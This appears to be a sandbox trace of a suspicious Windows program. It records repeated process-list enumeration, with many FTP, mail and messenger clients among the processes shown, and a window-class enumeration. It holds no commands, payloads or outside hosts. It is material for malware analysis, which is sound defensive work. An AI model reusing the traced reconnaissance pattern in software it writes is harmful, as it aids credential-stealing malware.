lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.703] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.704] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0293.706] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0293.707] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.709] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.710] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.711] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.713] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.714] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.716] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.717] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.718] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.720] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.721] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.722] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0293.724] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0293.725] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.727] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0293.728] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0293.729] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0293.731] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0293.776] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.778] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0293.780] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0293.782] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.784] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.786] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0293.789] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0293.790] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0293.792] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0293.793] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0293.795] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0293.796] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0293.798] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0293.799] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0293.800] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0293.802] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0293.803] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0293.804] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0293.806] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0293.807] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0293.858] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0293.860] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0293.862] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0293.864] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0293.866] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0293.867] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0293.869] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0293.871] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0293.873] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0293.875] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0293.877] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0293.879] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0293.880] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0293.882] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0293.884] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0293.885] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0293.887] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0293.889] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0293.891] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0293.892] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0293.894] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0293.896] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0293.951] Sleep (dwMilliseconds=0x64) [0294.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20d0 [0294.120] Process32First (in: hSnapshot=0x20d0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.231] Sleep (dwMilliseconds=0x64) [0294.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2120 [0294.352] Process32First (in: hSnapshot=0x2120, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.519] Sleep (dwMilliseconds=0x64) [0294.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff0 [0294.647] Process32First (in: hSnapshot=0x1ff0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.737] Sleep (dwMilliseconds=0x64) [0294.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff0 [0294.855] Process32First (in: hSnapshot=0x1ff0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.044] Sleep (dwMilliseconds=0x64) [0295.271] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2120 [0295.284] Process32First (in: hSnapshot=0x2120, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.368] Sleep (dwMilliseconds=0x64) [0295.518] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff0 [0295.527] Process32First (in: hSnapshot=0x1ff0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.689] Sleep (dwMilliseconds=0x64) [0295.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x524 [0295.807] Process32First (in: hSnapshot=0x524, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 173 os_tid = 0x110c [0232.688] EnumWindows (lpEnumFunc=0x2463dd0, lParam=0x2360000) returned 1 [0232.689] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0232.689] GetClassNameA (in: hWnd=0x1014a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0232.689] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0232.689] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.689] GetClassNameA (in: hWnd=0x10120, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.689] GetClassNameA (in: hWnd=0x10122, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.689] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.689] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.689] GetClassNameA (in: hWnd=0x10118, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0232.689] GetClassNameA (in: hWnd=0x10116, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.689] GetClassNameA (in: hWnd=0x10114, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0232.689] GetClassNameA (in: hWnd=0x10178, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.689] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.689] GetClassNameA (in: hWnd=0x1015a, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0232.689] GetClassNameA (in: hWnd=0x10112, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0232.690] GetClassNameA (in: hWnd=0x10102, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0232.690] GetClassNameA (in: hWnd=0x10198, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0232.690] GetClassNameA (in: hWnd=0x10196, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="VSyncHelper-00000000061A2330-1a4b5f2") returned 36 [0232.690] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="RawInputClass") returned 13 [0232.690] GetClassNameA (in: hWnd=0x10188, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0232.690] GetClassNameA (in: hWnd=0x100d8, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x100b2, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0232.690] GetClassNameA (in: hWnd=0x100b6, lpClassName=0x104efd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 